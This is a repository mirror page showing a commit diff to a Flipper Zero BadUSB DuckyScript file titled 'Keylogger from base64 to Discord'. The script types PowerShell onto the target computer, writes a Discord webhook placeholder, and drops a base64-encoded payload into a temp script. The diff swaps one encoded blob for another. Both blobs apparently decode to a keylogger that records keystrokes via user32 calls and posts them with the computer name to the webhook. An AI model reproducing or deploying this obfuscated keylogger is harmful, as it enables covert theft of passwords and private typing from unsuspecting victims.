gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2025-12-12 07:40:44 -08:00
Code Issues Packages Projects Releases Wiki Activity

Update Keylogger from base64 to Discord.txt

Browse Source
This commit is contained in:
beigeworm
2023-08-11 00:45:46 +01:00
committed by GitHub
parent 92bc8beca2
commit 68bb026ba3
1 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
OSINT/Keylogger from base64 to Discord.txt
View File

@@ -21,7 +21,7 @@ DELAY 5000
STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
ENTER
STRING $b64 = 'JEFQSSA9IEAnDQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIA0KcHVibGljIHN0YXRpYyBleHRlcm4gc2hvcnQgR2V0QXN5bmNLZXlTdGF0ZShpbnQgdmlydHVhbEtleUNvZGUpOyANCltEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldDQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0S2V5Ym9hcmRTdGF0ZShieXRlW10ga2V5c3RhdGUpOw0KW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0NCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBNYXBWaXJ0dWFsS2V5KHVpbnQgdUNvZGUsIGludCB1TWFwVHlwZSk7DQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gaW50IFRvVW5pY29kZSh1aW50IHdWaXJ0S2V5LCB1aW50IHdTY2FuQ29kZSwgYnl0ZVtdIGxwa2V5c3RhdGUsIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIgcHdzekJ1ZmYsIGludCBjY2hCdWZmLCB1aW50IHdGbGFncyk7DQonQA0KDQokbHB0aCA9ICIkZW52OnRlbXAvdC50eHQiDQokQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJEFQSSAtTmFtZSAnV2luMzInIC1OYW1lc3BhY2UgQVBJIC1QYXNzVGhydQ0KJG5vID0gTmV3LUl0ZW0gLVBhdGggJGxwdGggLUl0ZW1UeXBlIEZpbGUgLUZvcmNlDQokZmNvbnQgPSBHZXQtQ29udGVudCAtUGF0aCAkbHB0aCAtUmF3DQokbGt0ID0gW1N5c3RlbS5EaWFnbm9zdGljcy5TdG9wd2F0Y2hdOjpTdGFydE5ldygpDQoka3RoID0gW1RpbWVTcGFuXTo6RnJvbVNlY29uZHMoMTApDQpXaGlsZSAoJHRydWUpew0KJGtwciA9ICRmYWxzZQ0KdHJ5ew0Kd2hpbGUgKCRsa3QuRWxhcHNlZCAtbHQgJGt0aCkgew0KU3RhcnQtU2xlZXAgLU1pbGxpc2Vjb25kcyAzMA0KZm9yICgkYXNjID0gOTsgJGFzYyAtbGUgMjU0OyAkYXNjKyspew0KJGtleXN0ID0gJEFQSTo6R2V0QXN5bmNLZXlTdGF0ZSgkYXNjKQ0KaWYgKCRrZXlzdCAtZXEgLTMyNzY3KSB7DQoka3ByID0gJHRydWUNCiRsa3QuUmVzdGFydCgpDQokbnVsbCA9IFtjb25zb2xlXTo6Q2Fwc0xvY2sNCiR2dGtleSA9ICRBUEk6Ok1hcFZpcnR1YWxLZXkoJGFzYywgMykNCiRrYnN0ID0gTmV3LU9iamVjdCBCeXRlW10gMjU2DQokY2hlY2trYnN0ID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdCkNCiRsb2djaGFyID0gTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciAgICAgDQppZiAoJEFQSTo6VG9Vbmljb2RlKCRhc2MsICR2dGtleSwgJGtic3QsICRsb2djaGFyLCAkbG9nY2hhci5DYXBhY2l0eSwgMCkpIHsNCltTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGxwdGgsICRsb2djaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKSANCn19fX19DQpmaW5hbGx5ew0KSWYgKCRrcHIpew0KJGZjb250ID0gR2V0LUNvbnRlbnQgLVBhdGggJGxwdGggLVJhdw0KJGVzY21zZ3N5cyA9ICRmY29udCAtcmVwbGFjZSAnWyY8Pl0nLCB7JGFyZ3NbMF0uVmFsdWUuUmVwbGFjZSgnJicsICcmYW1wOycpLlJlcGxhY2UoJzwnLCAnJmx0OycpLlJlcGxhY2UoJz4nLCAnJmd0OycpfQ0KJGpzb25zeXMgPSBAeyJ1c2VybmFtZSIgPSAiJGVudjpDT01QVVRFUk5BTUUiIDsiY29udGVudCIgPSAkZXNjbXNnc3lzfSB8IENvbnZlcnRUby1Kc29uDQpJbnZva2UtUmVzdE1ldGhvZCAtVXJpICRkYyAtTWV0aG9kIFBvc3QgLUNvbnRlbnRUeXBlICJhcHBsaWNhdGlvbi9qc29uIiAtQm9keSAkanNvbnN5cw0KUmVtb3ZlLUl0ZW0gLVBhdGggJGxwdGggLUZvcmNlDQoka3ByID0gJGZhbHNlDQp9fQ0KJGxrdC5SZXN0YXJ0KCkNClN0YXJ0LVNsZWVwIC1NaWxsaXNlY29uZHMgMTANCn0='
STRING $b64 = 'JGEgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvLCBFeGFjdFNwZWxsaW5nPXRydWUpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBzaG9ydCBHZXRBc3luY0tleVN0YXRlKGludCB2aXJ0dWFsS2V5Q29kZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRLZXlib2FyZFN0YXRlKGJ5dGVbXSBrZXlzdGF0ZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBNYXBWaXJ0dWFsS2V5KHVpbnQgdUNvZGUsIGludCB1TWFwVHlwZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBUb1VuaWNvZGUodWludCB3VmlydEtleSwgdWludCB3U2NhbkNvZGUsIGJ5dGVbXSBscGtleXN0YXRlLCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHB3c3pCdWZmLCBpbnQgY2NoQnVmZiwgdWludCB3RmxhZ3MpOyc7JGEgPSBBZGQtVHlwZSAtTWVtYmVyRGVmaW5pdGlvbiAkYSAtTmFtZSAnV2luMzInIC1OYW1lc3BhY2UgQVBJIC1QYXNzVGhydTskYiA9IFtTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoXTo6U3RhcnROZXcoKTskYyA9IFtUaW1lU3Bhbl06OkZyb21TZWNvbmRzKDEwKTtXaGlsZSgkdHJ1ZSl7JGQgPSAkZmFsc2U7dHJ5e3doaWxlICgkYi5FbGFwc2VkIC1sdCAkYyl7U2xlZXAgLU1pbGxpc2Vjb25kcyAzMDtmb3IoJGUgPSA4OyAkZSAtbGUgMjU0OyAkZSsrKXskZiA9ICRhOjpHZXRBc3luY0tleVN0YXRlKCRlKTtpZiAoJGYgLWVxIC0zMjc2Nyl7JGQgPSAkdHJ1ZTskYi5SZXN0YXJ0KCk7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyRnID0gJGE6Ok1hcFZpcnR1YWxLZXkoJGUsIDMpOyRoID0gTmV3LU9iamVjdCBCeXRlW10gMjU2OyRqID0gJGE6OkdldEtleWJvYXJkU3RhdGUoJGgpOyRrID0gTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcjtpZigkYTo6VG9Vbmljb2RlKCRlLCAkZywgJGgsICRrLCAkay5DYXBhY2l0eSwgMCkpezskbCA9ICRrLlRvU3RyaW5nKCk7aWYgKCRlIC1lcSA4KSB7JGwgPSAiW0JLU1BdIn07aWYgKCRlIC1lcSAxMykgeyRsID0gIltFTlRdIn07aWYgKCRlIC1lcSAyNykgeyRsID0gIltFU0NdIn07JG0gKz0gJGx9fX19fWZpbmFsbHl7SWYoJGQpeyRuID0gJG0gLXJlcGxhY2UgJ1smPD5dJywgeyRhcmdzWzBdLlZhbHVlLlJlcGxhY2UoJyYnLCAnJmFtcDsnKS5SZXBsYWNlKCc8JywgJyZsdDsnKS5SZXBsYWNlKCc+JywgJyZndDsnKX07JG8gPSBHZXQtRGF0ZSAtRm9ybWF0ICJkZC1NTS15eXl5IEhIOm1tOnNzIjskcCA9ICRvKyIgOiAiKydgJyskbisnYCc7JHEgPSBAeyJ1c2VybmFtZSIgPSAiJGVudjpDT01QVVRFUk5BTUUiIDsiY29udGVudCIgPSAkcH0gfCBDb252ZXJ0VG8tSnNvbjtpcm0gLVVyaSAkZGMgLU1ldGhvZCBQb3N0IC1Db250ZW50VHlwZSAiYXBwbGljYXRpb24vanNvbiIgLUJvZHkgJHE7JGQgPSAkZmFsc2U7JG0gPSAiIn19JGIuUmVzdGFydCgpO1NsZWVwIC1NaWxsaXNlY29uZHMgMTB9'
ENTER
STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append
ENTER